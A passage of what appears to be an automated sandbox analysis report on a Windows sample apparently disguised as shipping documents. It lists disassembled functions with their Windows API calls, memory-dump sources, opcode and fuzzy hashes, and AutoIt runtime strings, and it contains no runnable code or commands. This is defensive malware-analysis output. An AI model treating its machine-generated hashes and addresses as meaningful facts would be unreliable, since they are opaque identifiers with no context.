                                                • GetWindowRect.USER32(?,?), ref: 006917FE
                                                • ScreenToClient.USER32(?,?), ref: 0069181B
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0069182C
                                                • EndPaint.USER32(?,?), ref: 00691876
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                • String ID:
                                                • API String ID: 1827037458-0
                                                • Opcode ID: 2f6c22b8f90a69823ec4f08adf359c8cbd4ee46aa8e4de3ee24de52c663edec1
                                                • Instruction ID: 542bb7577ff3f5f3930bbc1599e09a9892dcf022b7b84b097cf229a81d71792e
                                                • Opcode Fuzzy Hash: 2f6c22b8f90a69823ec4f08adf359c8cbd4ee46aa8e4de3ee24de52c663edec1
                                                • Instruction Fuzzy Hash: CC41E270100302AFDB10DF68CC84FF63BF9EB4A724F248628F9948B2A1C775A845DB61
                                                Function 0071B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(007567B0,00000000,01654CF0,?,?,007567B0,?,0071B862,?,?), ref: 0071B9CC
                                                • EnableWindow.USER32(00000000,00000000), ref: 0071B9F0
                                                • ShowWindow.USER32(007567B0,00000000,01654CF0,?,?,007567B0,?,0071B862,?,?), ref: 0071BA50
                                                • ShowWindow.USER32(00000000,00000004,?,0071B862,?,?), ref: 0071BA62
                                                • EnableWindow.USER32(00000000,00000001), ref: 0071BA86
                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0071BAA9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$Show$Enable$MessageSend
                                                • String ID:
                                                • API String ID: 642888154-0
                                                • Opcode ID: 403933c3fb8a3753a623bbdef988f7c02a745896c90ee42e4789a499c621cd92
                                                • Instruction ID: e143173fe4a018d5a4e53587b4445f4add5fe03b8a849e85cc165700358e19f1
                                                • Opcode Fuzzy Hash: 403933c3fb8a3753a623bbdef988f7c02a745896c90ee42e4789a499c621cd92
                                                • Instruction Fuzzy Hash: 87412F34600641EFDB25CF2CC499BD57BE1BF05315F1881A9FA488F6E2C735A886CB51
                                                Function 007073B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,00705134,?,?,00000000,00000001), ref: 007073BF
                                                  • Part of subcall function 00703C94: GetWindowRect.USER32(?,?), ref: 00703CA7
                                                • GetDesktopWindow.USER32 ref: 007073E9
                                                • GetWindowRect.USER32(00000000), ref: 007073F0
                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00707422
                                                  • Part of subcall function 006F54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F555E
                                                • GetCursorPos.USER32(?), ref: 0070744E
                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007074AC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                • String ID:
                                                • API String ID: 4137160315-0
                                                • Opcode ID: c918fa58f99a9ad569f9c07dbb04521374e4718ad3fa008276be0908fb6e3d4c
                                                • Instruction ID: fb675996f303876c015398e18d3e8e63ed4fad9f8857f0f0bf90534c8749c401
                                                • Opcode Fuzzy Hash: c918fa58f99a9ad569f9c07dbb04521374e4718ad3fa008276be0908fb6e3d4c
                                                • Instruction Fuzzy Hash: 7631F232508345ABD724DF18C849E9BBBEAFF88304F004A19F589971D1C634E908CB96
                                                Function 006E8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006E85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006E8608
                                                  • Part of subcall function 006E85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006E8612
                                                  • Part of subcall function 006E85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006E8621
                                                  • Part of subcall function 006E85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006E8628
                                                  • Part of subcall function 006E85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006E863E
                                                • GetLengthSid.ADVAPI32(?,00000000,006E8977), ref: 006E8DAC
                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 006E8DB8
                                                • HeapAlloc.KERNEL32(00000000), ref: 006E8DBF
                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 006E8DD8
                                                • GetProcessHeap.KERNEL32(00000000,00000000,006E8977), ref: 006E8DEC
                                                • HeapFree.KERNEL32(00000000), ref: 006E8DF3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                • String ID:
                                                • API String ID: 3008561057-0
                                                • Opcode ID: 4dbfea9375f5d3cc6d4aa619b35bf923faebb3561e4f4e07358ecb3815e6ad61
                                                • Instruction ID: 288b3c7c77536342b449437f825c85c60c3ae99886464acfa43238853a2463ed
                                                • Opcode Fuzzy Hash: 4dbfea9375f5d3cc6d4aa619b35bf923faebb3561e4f4e07358ecb3815e6ad61
                                                • Instruction Fuzzy Hash: F411AC31902609FFDB109FA9CC09BEEBBAAEF55315F108169E84997290CB369D00DB64
                                                Function 006E8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006E8B2A
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 006E8B31
                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006E8B40
                                                • CloseHandle.KERNEL32(00000004), ref: 006E8B4B
                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006E8B7A
                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 006E8B8E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                • String ID:
                                                • API String ID: 1413079979-0
                                                • Opcode ID: aa1271459a5f9192587c05b0a80659e5e40e8e7e6f5d2ad674ad3103406cef98
                                                • Instruction ID: 8153a66032b7b3b3bbdf309a7108ebb41654102a9dde8f451fd3f3840f72d064
                                                • Opcode Fuzzy Hash: aa1271459a5f9192587c05b0a80659e5e40e8e7e6f5d2ad674ad3103406cef98
                                                • Instruction Fuzzy Hash: FF112CB2501249AFDF01CFA9DD49FDE7BAAEF08314F048065FE08A61A0C7759D65DB60
                                                Function 0071C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006912F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0069134D
                                                  • Part of subcall function 006912F3: SelectObject.GDI32(?,00000000), ref: 0069135C
                                                  • Part of subcall function 006912F3: BeginPath.GDI32(?), ref: 00691373
                                                  • Part of subcall function 006912F3: SelectObject.GDI32(?,00000000), ref: 0069139C
                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0071C1C4
                                                • LineTo.GDI32(00000000,00000003,?), ref: 0071C1D8
                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0071C1E6
                                                • LineTo.GDI32(00000000,00000000,?), ref: 0071C1F6
                                                • EndPath.GDI32(00000000), ref: 0071C206
                                                • StrokePath.GDI32(00000000), ref: 0071C216
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                • String ID:
                                                • API String ID: 43455801-0
                                                • Opcode ID: 69d49aa9b7ee011a05fbe019e6294da95aa2ea7a01fff70be6e772d8d2e8bc7a
                                                • Instruction ID: a7f3ae0073f8d03526ecd83dafd8724d00147d0ff2bfa9958790225bb9d6cce1
                                                • Opcode Fuzzy Hash: 69d49aa9b7ee011a05fbe019e6294da95aa2ea7a01fff70be6e772d8d2e8bc7a
                                                • Instruction Fuzzy Hash: 1F11097640014DBFDF129F94DC88EEA7FADEB08354F14C021FA184A1A1C7759E95DBA4
                                                Function 006B03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006B03D3
                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 006B03DB
                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006B03E6
                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006B03F1
                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 006B03F9
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 006B0401
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Virtual
                                                • String ID:
                                                • API String ID: 4278518827-0
                                                • Opcode ID: 3b0e8b14e3a1b2e06fbbc44636c631f29efde770f95560b55bf368e8f9a20cc0
                                                • Instruction ID: 75088a9c96e027d7591fd6da29afa6d99cfb27887eb8c3f74ddd1fa4b82ae84c
                                                • Opcode Fuzzy Hash: 3b0e8b14e3a1b2e06fbbc44636c631f29efde770f95560b55bf368e8f9a20cc0
                                                • Instruction Fuzzy Hash: 8E016CB0901B59BDE3008F5A8C85B52FFA8FF19354F00411BE15C47941C7F5A864CBE5
                                                Function 006F568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006F569B
                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006F56B1
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 006F56C0
                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006F56CF
                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006F56D9
                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006F56E0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                • String ID:
                                                • API String ID: 839392675-0
                                                • Opcode ID: 037e4ba104e8ffc4c66e2c369eb63d7f31e621cc0db78b096531ce5c39741ddc
                                                • Instruction ID: 8f55f73bf8604ddbad40edfabf85e1592b853d857f4b5e35190589117406ad50
                                                • Opcode Fuzzy Hash: 037e4ba104e8ffc4c66e2c369eb63d7f31e621cc0db78b096531ce5c39741ddc
                                                • Instruction Fuzzy Hash: BDF09032241518BBE3215BA6DC0DEEF7F7CEFC6B11F008169FA04D10A0D7A41A0186B9
                                                Function 006F74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,?), ref: 006F74E5
                                                • EnterCriticalSection.KERNEL32(?,?,006A1044,?,?), ref: 006F74F6
                                                • TerminateThread.KERNEL32(00000000,000001F6,?,006A1044,?,?), ref: 006F7503
                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,006A1044,?,?), ref: 006F7510
                                                  • Part of subcall function 006F6ED7: CloseHandle.KERNEL32(00000000,?,006F751D,?,006A1044,?,?), ref: 006F6EE1
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 006F7523
                                                • LeaveCriticalSection.KERNEL32(?,?,006A1044,?,?), ref: 006F752A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                • String ID:
                                                • API String ID: 3495660284-0
                                                • Opcode ID: 29d86d9ad2a8373712d796c51c7e79762ab70c4eda716d43fb41c9375e0659d4
                                                • Instruction ID: af707ba1d571fc2dfe6887c5f07ef81ff3b8b8fb816f657fade26db6c34cd099
                                                • Opcode Fuzzy Hash: 29d86d9ad2a8373712d796c51c7e79762ab70c4eda716d43fb41c9375e0659d4
                                                • Instruction Fuzzy Hash: BAF05E7A544612EBDB511B68FC8D9EF772BFF45312B008631F602910F0CBB95811CB54
                                                Function 006E8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006E8E7F
                                                • UnloadUserProfile.USERENV(?,?), ref: 006E8E8B
                                                • CloseHandle.KERNEL32(?), ref: 006E8E94
                                                • CloseHandle.KERNEL32(?), ref: 006E8E9C
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 006E8EA5
                                                • HeapFree.KERNEL32(00000000), ref: 006E8EAC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                • String ID:
                                                • API String ID: 146765662-0
                                                • Opcode ID: e8abda6adec859afff0b14cd45038d73d96607f42ac2a6042144b2a3a650fa60
                                                • Instruction ID: ce77af4089731de237d61aec11c390d9b3a285fa87f90ba35f5c7d2c199b7464
                                                • Opcode Fuzzy Hash: e8abda6adec859afff0b14cd45038d73d96607f42ac2a6042144b2a3a650fa60
                                                • Instruction Fuzzy Hash: D0E0C236104405FBDA011FE9EC0C98ABF79FB89322B50C230F229810B0CB3A9820EB58
                                                Function 006E7A78 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                Download Yara Rule
                                                APIs
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00722C7C,?), ref: 006E7C32
                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00722C7C,?), ref: 006E7C4A
                                                • CLSIDFromProgID.OLE32(?,?,00000000,0071FB80,000000FF,?,00000000,00000800,00000000,?,00722C7C,?), ref: 006E7C6F
                                                • _memcmp.LIBCMT ref: 006E7C90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FromProg$FreeTask_memcmp
                                                • String ID: ,,r
                                                • API String ID: 314563124-1227627816
                                                • Opcode ID: 91cc2c796559b6e2e447e3abc2ad316d97adc6a4881c1e6c0a4cf45dbc62997f
                                                • Instruction ID: d38b9159f36aaab0eeba3c22d077cc2eba5e8798ced7c4a4afb6fda4f75eb6d5
                                                • Opcode Fuzzy Hash: 91cc2c796559b6e2e447e3abc2ad316d97adc6a4881c1e6c0a4cf45dbc62997f
                                                • Instruction Fuzzy Hash: 92811D75A01209EFCB04DF94C984DEEB7BAFF89715F204198F505AB250DB71AE46CB60
                                                Function 00708902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                Download Yara Rule
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 00708928
                                                • CharUpperBuffW.USER32(?,?), ref: 00708A37
                                                • VariantClear.OLEAUT32(?), ref: 00708BAF
                                                  • Part of subcall function 006F7804: VariantInit.OLEAUT32(00000000), ref: 006F7844
                                                  • Part of subcall function 006F7804: VariantCopy.OLEAUT32(00000000,?), ref: 006F784D
                                                  • Part of subcall function 006F7804: VariantClear.OLEAUT32(00000000), ref: 006F7859
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                • API String ID: 4237274167-1221869570
                                                • Opcode ID: e92744d51c98b666861dcf7787272e484cb36525382507e66898de045e8b04be
                                                • Instruction ID: da907b6e6dc482387d7c9ef4aaa1de9f53364cfa70a04369aa7673de680667d7
                                                • Opcode Fuzzy Hash: e92744d51c98b666861dcf7787272e484cb36525382507e66898de045e8b04be
                                                • Instruction Fuzzy Hash: AD917171604301DFCB50DF28C48495BBBE9EF89314F048A6EF8968B3A1DB35E945CB52
                                                Function 006F2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006AFEC6: _wcscpy.LIBCMT ref: 006AFEE9
                                                • _memset.LIBCMT ref: 006F3077
                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006F30A6
                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006F3159
                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 006F3187
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                • String ID: 0
                                                • API String ID: 4152858687-4108050209
                                                • Opcode ID: 9143f419690295d529661a524a7f915c1cb044119463a073ee47e2d16f558070
                                                • Instruction ID: 75031620c1f743c05a284916a70597f1bc874a6f154b334fa52cfe9cea2d3d6d
                                                • Opcode Fuzzy Hash: 9143f419690295d529661a524a7f915c1cb044119463a073ee47e2d16f558070
                                                • Instruction Fuzzy Hash: 2F51F4716093289AD715EF28C8456FBB7EAEF45320F044A2EFA85D73A0DB70CE448756
                                                Function 006F2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 006F2CAF
                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006F2CCB
                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 006F2D11
                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00756890,00000000), ref: 006F2D5A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem_memset
                                                • String ID: 0
                                                • API String ID: 1173514356-4108050209
                                                • Opcode ID: f97c089507206cf2ca00c65db4d15e984f52ef5fcfea80d370e87526bc9c6d74
                                                • Instruction ID: 52ffc17f0171b81f5699a7bb0b33febf7e064374060197647ee23e6ca8d388f9
                                                • Opcode Fuzzy Hash: f97c089507206cf2ca00c65db4d15e984f52ef5fcfea80d370e87526bc9c6d74
                                                • Instruction Fuzzy Hash: EE418F302083069FD720DF28C855BAABBAAFF85320F14461DEA65972D1D770E904CFA6
                                                Function 0070DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                Download Yara Rule
                                                APIs
                                                • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0070DAD9
                                                  • Part of subcall function 006979AB: _memmove.LIBCMT ref: 006979F9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
